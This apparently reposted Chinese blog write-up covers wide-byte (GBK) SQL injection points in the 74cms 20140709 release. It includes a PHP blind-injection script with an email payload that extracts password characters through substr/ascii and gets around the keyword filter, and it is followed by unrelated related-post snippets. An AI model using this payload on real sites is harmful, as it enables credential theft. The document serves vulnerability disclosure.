74cms 20140709 9枚注入打個包

2022-09-23 23:57:09 字數 1846 閱讀 4982

不好好修改漏洞** 而是修改過濾函式 雖然你們這過濾函式我繞不過。

但是過濾的還不是很完善, 還能出資料。

還是在修改過濾函式的同時好好修改下產生漏洞的**把。

看過濾函式

function remove_xss($string)

$pattern .= $parm[$i][$j];

}$pattern .= '/i';

$string = preg_replace($pattern, '****', $string);

}return $string;

}這裡開啟了i模式而且replace成**** 之前是replace空還能繞過 現在我沒辦法了。

那就想辦法繞過這些關鍵字。 可以看到過濾了union select 之類的常用的關鍵字。

wooyun: 74cms 最新版 注入1-3

wooyun: 74cms 最新版 注入4-7

wooyun: 74cms 最新版 注入8-9

這裡 9枚注入 我下了個0709的看 沒一處修改的 就是修改了過濾函式。

9處都是一樣的 這裡我就選一處來說就好了。

在plus/ajax_user.php中

elseif($act == 'check_email')

$user=get_user_inemail($email);

empty($user)?exit("true"):exit("false");

}這裡涉及到了轉碼 之前也說得很清楚了。

錦 從utf-8 轉換到 gbk為%e5%5c

單引號被轉義後成\' \為%5c

兩個%5c%5c又再閉合 單引號出來 所以造成了注入。

在這裡由於過濾了關鍵字 但是還是能繞過。

利用substr來

當為正確的資料的時候會返回false 因為是正確的會查詢出來

這裡是檢測是否重複 查詢出來就說明重複了 就返回了false。

這裡我自己寫了個小指令碼。

- - 我不會php 挺簡單的東西折騰了半天。

<?php

$yu=1;

for($i=0;$i<120;$i++);

$content="email=x%e9%8c%a6' or if(ascii(substr(left(password,$yu),$yu,1))=$i,1,null)%23";

$url = '';//接收xml位址

看這語句 沒含有過濾的關鍵字 所以可以成功。

在繼續完善過濾函式的同時也改改這九處轉換編碼的地方。

在修改過濾函式的同時好好修改下產生漏洞的**把。

74cms漏洞分析

很早以前的乙個洞,看到很有意思就拿來看看 這是雨曾經審過的乙個洞,因為讀取方式很特別復現了一下 首先看到乙個sql語句 idresult this query select id from wheresql.orderbysql.limit 倒回去跟進幾個變數 orderbysql order by...

74CMS 3 0 SQL注入漏洞前台

1.雙擊執行桌面phpstudy.exe軟體 2.點選啟動按鈕,啟動伺服器環境 1.雙擊啟動桌面seay源 審計系統軟體 2.因為74cms3.0源 編輯使用gbk編輯,所以首先需要先將編碼改成gbk 3.點選新建專案按鈕,彈出對畫框中選擇 c phpstudy www 74cms 點選確定 漏洞分...

7 4 整除光棍(20 分)

7 4 整除光棍 20 分 這裡所謂的 光棍 並不是指單身汪啦 說的是全部由1組成的數字,比如1 11 111 1111等。傳說任何乙個光棍都能被乙個不以5結尾的奇數整除。比如,111111就可以被13整除。現在,你的程式要讀入乙個整數x,這個整數一定是奇數並且不以5結尾。然後,經過計算,輸出兩個數...